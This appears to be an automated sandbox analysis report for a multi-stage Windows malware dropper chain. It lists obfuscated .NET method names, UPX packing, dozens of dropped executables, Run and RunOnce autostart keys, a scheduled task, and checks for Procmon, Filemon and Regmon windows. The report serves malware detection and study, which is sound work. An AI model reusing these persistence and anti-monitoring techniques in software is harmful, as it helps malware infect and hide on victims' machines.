Source: 6z1l5Yn.exe.15.dr, g4E6Q.cs	High entropy of concatenated method names: 'Ez9j1', 'z0QNw', 'tSge1CSYfRT5Kck3JTR', 'hR0NgbSeAsZ4M48l4C2', 'iFGulfSmhILImZpKLRr', 'P51VMQSpFJPe8M5riIW', 'zc5BVXSgfaJC3avjHOU', 'Mq64P', 'cf9PZ4Sik4GWPsx7jOs', 'FrTusMSresPKMuWkR2D'
Source: 6z1l5Yn.exe.15.dr, Ny4p1S8.cs	High entropy of concatenated method names: 'xQXrO5ffUqHeWSk1bJE', 'M2IvPTfVLYC42spjo1s', 'v0tnRhf65T98p3ROlNF', 'g8QyjZfOG1fICoEVPsJ', 'Zy4f1X8', 'q0J7Gde', 'Pr19EiC', 'r9TQj38', 'Ko9r7QA', 'Px8y1G5'
Source: 6z1l5Yn.exe.15.dr, o5CGf.cs	High entropy of concatenated method names: 'a3PDz02', 'QexoqZ6Radvmn1VKnUd', 'atR49B6MStJT1rBZpai', 'qNtW826eG2fSWPuEqT1', 'QesKfG6g71xfgGvuW8B', 'Zx7n3', 'Ny1p0', 'Wr9q5', 'c4GSk', 'Sd56P'
Source: 6z1l5Yn.exe.15.dr, x4QWw.cs	High entropy of concatenated method names: 'b2G3Q', 'q1MYs', 'An45W', 'w4DAt', 'Sq60Z', 'q1CJa', 'llGb2KQoGsfyF2cacjQ', 'JrFUsPQdZaVl1BOObYg', 'VZmjp8QAnI2dCfZJOdw', 'aEEBDJQTQr8XjGoRSL4'
Source: 6z1l5Yn.exe.15.dr, b8NKa72.cs	High entropy of concatenated method names: 'Kd0r2AF', 'MoveNext', 'q7T2Zgn', 'SetStateMachine', 'HVxlVrOkPRPfwie07Bl', 'Fh1t9pOIU2ohV6qmcv4', 'auxoSFOneI3RtPVZG9L', 'CCeED8OQO5DvDlfp2AN', 'aPBnHTOSX4GrioRtM04', 'kLf2tNO6FXAvc9VM07A'
Source: 6z1l5Yn.exe.15.dr, eyvhA9ywBJ81AtfmER.cs	High entropy of concatenated method names: 'CpOeQcVVkPvcG', 'iUAmXk2qJwSaQ9NWoWF', 'ikVRtj29jevm3eSB5AU', 'CRRISj2vZGtDYFJ0lYt', 'V93q0Q275EI6qGexGJT', 'OarONf2NHQCp4SLBakn', 'cpXTtb2wJkH7dJLteH2', 'dQAofN2sW7n7y2iMiXJ', 'JJKxr72DAM6316Pmp34', 'ugWW5U2CVZr92XsqROK'
Source: 6z1l5Yn.exe.15.dr, x7DHw6g4.cs	High entropy of concatenated method names: 'c6BYw', 'c9F1A', 'Qd20K', 'p8XZx', 'd7BXi', 's1K7X', 'GRGl4uY08vmViMoVUe', 'omYMLOeh2w0arrui0E', 'dXaTCUmEKfyMlXRN4m', 'SPMBEMpAKE2vtmXuri'
Source: mAtJWNv[1].exe.15.dr, Ce716WgjPJi1to0DwO.cs	High entropy of concatenated method names: 'eGZi6juOTvHuM3AqcMT', 'QImVx8u9prVJ6Q5ZhQE', 'xb8D5o8ice', 'fJWJrPuWkv2n2wknEjv', 'uGltkNu6BSessyYBViZ', 'C12RuXuxuWYaGcE7Doo', 'KO2BOSuQ5hwVCjxjiju', 'zgeLtquCOOSgYpfX44p', 'gjwjUouM8jUopDwUTXY', 'l52Wk9u0T44L3mo9PjS'
Source: mAtJWNv[1].exe.15.dr, gCnUgIvQu4UM8Qqkpr.cs	High entropy of concatenated method names: 'WKqgG71Jxr', 'GjNGI3dLvTpx0QRqhsw', 'jtT0jOdcN9fvs9pFR08', 'rRv5uvdqXA0lhjq3uIo', 'skpWCGdM30wyvKEnUVd', 'iBhaNId0SrTCk4ETfBw', 'b6ZCYEdG35m0wuZYCm6', 'BOeTaHdyC6WjDBnT867', 'CJ56DkdKD03B6aTUjsf'
Source: mAtJWNv[1].exe.15.dr, RhN4VuXG0bkU6RkQbjv.cs	High entropy of concatenated method names: 'oOrTcWmPb5', 'NH0TqtpkSe', 'omwTGnVxjh', 'iGWTyYs8lA', 'lU4TKZlNmh', 'e5STIWmrST', 'YeYTRC9Ljo', 'kQvXZ7gBkT', 'iOITUqHIfj', 'Fh4T2okLG1'
Source: mAtJWNv.exe.15.dr, Ce716WgjPJi1to0DwO.cs	High entropy of concatenated method names: 'eGZi6juOTvHuM3AqcMT', 'QImVx8u9prVJ6Q5ZhQE', 'xb8D5o8ice', 'fJWJrPuWkv2n2wknEjv', 'uGltkNu6BSessyYBViZ', 'C12RuXuxuWYaGcE7Doo', 'KO2BOSuQ5hwVCjxjiju', 'zgeLtquCOOSgYpfX44p', 'gjwjUouM8jUopDwUTXY', 'l52Wk9u0T44L3mo9PjS'
Source: mAtJWNv.exe.15.dr, gCnUgIvQu4UM8Qqkpr.cs	High entropy of concatenated method names: 'WKqgG71Jxr', 'GjNGI3dLvTpx0QRqhsw', 'jtT0jOdcN9fvs9pFR08', 'rRv5uvdqXA0lhjq3uIo', 'skpWCGdM30wyvKEnUVd', 'iBhaNId0SrTCk4ETfBw', 'b6ZCYEdG35m0wuZYCm6', 'BOeTaHdyC6WjDBnT867', 'CJ56DkdKD03B6aTUjsf'
Source: mAtJWNv.exe.15.dr, RhN4VuXG0bkU6RkQbjv.cs	High entropy of concatenated method names: 'oOrTcWmPb5', 'NH0TqtpkSe', 'omwTGnVxjh', 'iGWTyYs8lA', 'lU4TKZlNmh', 'e5STIWmrST', 'YeYTRC9Ljo', 'kQvXZ7gBkT', 'iOITUqHIfj', 'Fh4T2okLG1'

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe

File written: C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\twain_32\1u58lIqYIC.exe

Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File created: C:\Users\Public\Music\c4zJ2ehOP9IkZ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169790101\ADFoyxP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cuFIzyH[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File created: C:\Users\user\Desktop\SUySEdWK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\6z1l5Yn[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169730101\d151155bf3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169770101\cuFIzyH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169760101\ClhN6R8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\P2SXMuh[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169840101\0uzaP1a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File created: C:\Recovery\Gr2GcblCRURZoQ7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169870101\7T7bCyA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169860101\8p5Lrev.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169690101\c353af48cf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169720101\477fbd5c21.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	File created: C:\Users\user\AppData\Roaming\9OJj7W96hi.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\0uzaP1a[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169710101\f3f3c71039.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File created: C:\Program Files\Windows Sidebar\fSxaga9GAmNmiIyPxt32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169810101\v6Oqdnc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File created: C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169820101\zY9sqWs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169800101\HmngBpR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169880101\EJmAkGq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3B05c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\7T7bCyA[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169740101\c881d851ae.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ADFoyxP[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\8p5Lrev[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169850101\6z1l5Yn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\HmngBpR[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\EJmAkGq[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File created: C:\Windows\twain_32\1u58lIqYIC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	File created: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\zY9sqWs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169000101\EJmAkGq.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169700101\f86c60eea6.exe	Jump to dropped file
Source: C:\Windows\twain_32\1u58lIqYIC.exe	File created: C:\Users\user\Desktop\zIqELuAV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169830101\P2SXMuh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ClhN6R8[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\v6Oqdnc[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe

File created: C:\Windows\twain_32\1u58lIqYIC.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File created: C:\Users\user\Desktop\SUySEdWK.log			Jump to dropped file
Source: C:\Windows\twain_32\1u58lIqYIC.exe	File created: C:\Users\user\Desktop\zIqELuAV.log			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E21AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

1_2_00E21AE8

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c881d851ae.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c881d851ae.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c881d851ae.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process information set: NOOPENFILEERRORBOX
